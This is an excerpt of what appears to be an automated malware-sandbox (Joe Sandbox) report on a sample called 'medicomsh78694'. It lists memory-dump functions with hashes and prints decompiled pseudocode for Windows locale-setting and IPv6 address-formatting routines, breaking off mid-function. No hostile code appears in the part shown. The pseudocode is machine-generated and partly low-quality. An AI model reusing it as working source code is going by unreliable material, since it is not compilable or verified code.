                                                                            • Opcode ID: 6ab88480479560657ba7f379d328492a6c1322b525e08d8001c434104af3978a
                                                                            • Instruction ID: 40104f775c3cf91507469857a9c21bb4e732cd77a213ec3c3656661f3dbd8556
                                                                            • Opcode Fuzzy Hash: 6ab88480479560657ba7f379d328492a6c1322b525e08d8001c434104af3978a
                                                                            • Instruction Fuzzy Hash: A0E026302081916AD701DF788CC5EC63B644F49300F190499E8845B103CA38A755C390
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 00BC26F8, Relevance: .0, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                            • Instruction ID: 1f30a3687b065379234bda0c5f35f93989b12eaade08a89b8709a41ded5af6ba
                                                                            • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                            • Instruction Fuzzy Hash: 95F0AF21324159ABDB48EF1899D1B6A33D5EB94300F64C0BEA949C7251D6619D408690
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BB10D0, Relevance: .0, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                            • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                            • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                            • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BB0060, Relevance: .0, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                            • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                            • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                            • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BB01D4, Relevance: .0, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                            • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                            • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                            • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BB010C, Relevance: .0, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                            • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                            • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                            • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BB1148, Relevance: .0, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                            • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                            • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                            • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BD8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 94%
                                                                            			E00BD8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00BD8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00BBE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00BD718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00BD8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00BD718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00BD8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00BD8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00BD8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00BD718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00BBE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00BB2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00BCE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00BBE2A8(_t322,  &_v68, _v16);
								if(E00BD5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00BCE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00BBE2A8(_t322,  &_v68, _t236);
								if(E00BD5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00BD718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00BBE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00BB2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00BCE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00BBE2A8(_v12,  &_v68, _v16);
							if(E00BD5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00BCE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00BBE2A8(_t322,  &_v68, _t269);
							if(E00BD5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00BD718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00BBE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00BB2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00BCE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00BBE2A8(_v12,  &_v68, _v16);
						if(E00BD5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00BCE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00BBE2A8(_t322,  &_v68, _t296);
						if(E00BD5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                            0x00bd8788
                                                                            0x00bd8788
                                                                            0x00bd8791
                                                                            0x00bd8794
                                                                            0x00bd8798
                                                                            0x00bd879b
                                                                            0x00bd879e
                                                                            0x00bd87a1
                                                                            0x00bd87a4
                                                                            0x00bd87a7
                                                                            0x00bd87aa
                                                                            0x00bd87af
                                                                            0x00c21ad3
                                                                            0x00bd8b0a
                                                                            0x00bd8b0d
                                                                            0x00bd8b13
                                                                            0x00bd8b19
                                                                            0x00bd8b1f
                                                                            0x00bd8b25
                                                                            0x00bd8b2b
                                                                            0x00bd8b31
                                                                            0x00bd8b37
                                                                            0x00bd8b3d
                                                                            0x00bd8b46
                                                                            0x00bd8b46
                                                                            0x00bd87c6
                                                                            0x00bd87d0
                                                                            0x00c21ae0
                                                                            0x00c21ae6
                                                                            0x00c21af8
                                                                            0x00c21af8
                                                                            0x00c21afd
                                                                            0x00c21afe
                                                                            0x00c21b01
                                                                            0x00c21b06
                                                                            0x00c21b06
                                                                            0x00bd87d6
                                                                            0x00bd87f2
                                                                            0x00bd87f7
                                                                            0x00bd8807
                                                                            0x00bd880a
                                                                            0x00bd880f
                                                                            0x00bd8810
                                                                            0x00bd8813
                                                                            0x00bd8818
                                                                            0x00bd8818
                                                                            0x00bd882c
                                                                            0x00bd8831
                                                                            0x00bd8838
                                                                            0x00bd8908
                                                                            0x00bd8920
                                                                            0x00bd89f0
                                                                            0x00bd8a08
                                                                            0x00bd8af6
                                                                            0x00bd8af6
                                                                            0x00bd8af8
                                                                            0x00bd8afb
                                                                            0x00c21beb
                                                                            0x00c21beb
                                                                            0x00bd8b04
                                                                            0x00c21bf8
                                                                            0x00c21c0e
                                                                            0x00c21c13
                                                                            0x00c21c16
                                                                            0x00c21c16
                                                                            0x00c21bf8
                                                                            0x00000000
                                                                            0x00bd8b04
                                                                            0x00bd8a0e
                                                                            0x00bd8a11
                                                                            0x00bd8a14
                                                                            0x00bd8a15
                                                                            0x00bd8a18
                                                                            0x00bd8a22
                                                                            0x00bd8b59
                                                                            0x00bd8a28
                                                                            0x00bd8a3c
                                                                            0x00bd8a3c
                                                                            0x00bd8a42
                                                                            0x00c21bb0
                                                                            0x00c21b11
                                                                            0x00c21b11
                                                                            0x00000000
                                                                            0x00bd8a48
                                                                            0x00bd8a51
                                                                            0x00bd8a5b
                                                                            0x00bd8a5e
                                                                            0x00bd8a61
                                                                            0x00bd8a69
                                                                            0x00bd8a69
                                                                            0x00bd8a6d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00bd8a74
                                                                            0x00bd8a7c
                                                                            0x00bd8a7d
                                                                            0x00bd8a91
                                                                            0x00bd8a93
                                                                            0x00bd8a93
                                                                            0x00bd8a98
                                                                            0x00bd8a9b
                                                                            0x00bd8aa1
                                                                            0x00bd8aa1
                                                                            0x00bd8aa4
                                                                            0x00bd8aaa
                                                                            0x00bd8ab1
                                                                            0x00bd8ac5
                                                                            0x00bd8ac7
                                                                            0x00bd8ac7
                                                                            0x00bd8ac5
                                                                            0x00bd8ace
                                                                            0x00c21bc9
                                                                            0x00c21bce
                                                                            0x00c21bd2
                                                                            0x00c21bd2
                                                                            0x00bd8ad8
                                                                            0x00bd8aeb
                                                                            0x00bd8aeb
                                                                            0x00bd8af0
                                                                            0x00bd8af4
                                                                            0x00000000
                                                                            0x00bd8af4
                                                                            0x00bd8a42
                                                                            0x00bd8926
                                                                            0x00bd8929
                                                                            0x00bd892c
                                                                            0x00bd892d
                                                                            0x00bd8930
                                                                            0x00bd8935
                                                                            0x00bd893a
                                                                            0x00bd8b51
                                                                            0x00bd8940
                                                                            0x00bd8954
                                                                            0x00bd8954
                                                                            0x00bd895a
                                                                            0x00c21b63
                                                                            0x00000000
                                                                            0x00bd8960
                                                                            0x00bd8969
                                                                            0x00bd8973
                                                                            0x00bd8976
                                                                            0x00bd8979
                                                                            0x00bd897e
                                                                            0x00bd8981
                                                                            0x00bd8981
                                                                            0x00bd8986
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c21b6e
                                                                            0x00c21b74
                                                                            0x00c21b7b
                                                                            0x00c21b8f
                                                                            0x00c21b91
                                                                            0x00c21b91
                                                                            0x00c21b99
                                                                            0x00c21b9c
                                                                            0x00c21ba2
                                                                            0x00c21ba2
                                                                            0x00bd898c
                                                                            0x00bd8992
                                                                            0x00bd8999
                                                                            0x00bd89ad
                                                                            0x00c21ba8
                                                                            0x00c21ba8
                                                                            0x00bd89ad
                                                                            0x00bd89b6
                                                                            0x00bd89c8
                                                                            0x00bd89cd
                                                                            0x00bd89d0
                                                                            0x00bd89d0
                                                                            0x00bd89d6
                                                                            0x00bd89e8
                                                                            0x00bd89e8
                                                                            0x00bd89ed
                                                                            0x00000000
                                                                            0x00bd89ed
                                                                            0x00bd895a
                                                                            0x00bd883e
                                                                            0x00bd8841
                                                                            0x00bd8844
                                                                            0x00bd8845
                                                                            0x00bd8848
                                                                            0x00bd884d
                                                                            0x00bd8852
                                                                            0x00bd8b49
                                                                            0x00bd8858
                                                                            0x00bd886c
                                                                            0x00bd886c
                                                                            0x00bd8872
                                                                            0x00c21b0e
                                                                            0x00000000
                                                                            0x00bd8878
                                                                            0x00bd8881
                                                                            0x00bd888b
                                                                            0x00bd888e
                                                                            0x00bd8891
                                                                            0x00bd8896
                                                                            0x00bd8899
                                                                            0x00bd8899
                                                                            0x00bd889e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c21b21
                                                                            0x00c21b27
                                                                            0x00c21b2e
                                                                            0x00c21b42
                                                                            0x00c21b44
                                                                            0x00c21b44
                                                                            0x00c21b4c
                                                                            0x00c21b4f
                                                                            0x00c21b55
                                                                            0x00c21b55
                                                                            0x00bd88a4
                                                                            0x00bd88aa
                                                                            0x00bd88b1
                                                                            0x00bd88c5
                                                                            0x00c21b5b
                                                                            0x00c21b5b
                                                                            0x00bd88c5
                                                                            0x00bd88ce
                                                                            0x00bd88e0
                                                                            0x00bd88e5
                                                                            0x00bd88e8
                                                                            0x00bd88e8
                                                                            0x00bd88ee
                                                                            0x00bd8900
                                                                            0x00bd8900
                                                                            0x00bd8905
                                                                            0x00000000
                                                                            0x00bd8905

                                                                            APIs
                                                                            Strings
                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 00BD8914
                                                                            • Kernel-MUI-Number-Allowed, xrefs: 00BD87E6
                                                                            • WindowsExcludedProcs, xrefs: 00BD87C1
                                                                            • Kernel-MUI-Language-SKU, xrefs: 00BD89FC
                                                                            • Kernel-MUI-Language-Allowed, xrefs: 00BD8827
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: _wcspbrk
                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                            • API String ID: 402402107-258546922
                                                                            • Opcode ID: 4300c858a9f51a8277f3febb57c6d888ebddad4f41995e90f235c6c0a1e48cf7
                                                                            • Instruction ID: 1262d65c6b004d39c0fce84308c9590d457a734e618bda86d67ae7cafa98e890
                                                                            • Opcode Fuzzy Hash: 4300c858a9f51a8277f3febb57c6d888ebddad4f41995e90f235c6c0a1e48cf7
                                                                            • Instruction Fuzzy Hash: F4F1D4B2D00209EFCF11EF95C9819EEBBF8FF08301F1444AAE515A7621EB759A45DB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BF13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 38%
                                                                            			E00BF13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00BE7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xbb2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00BE7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xbb9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00BE7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
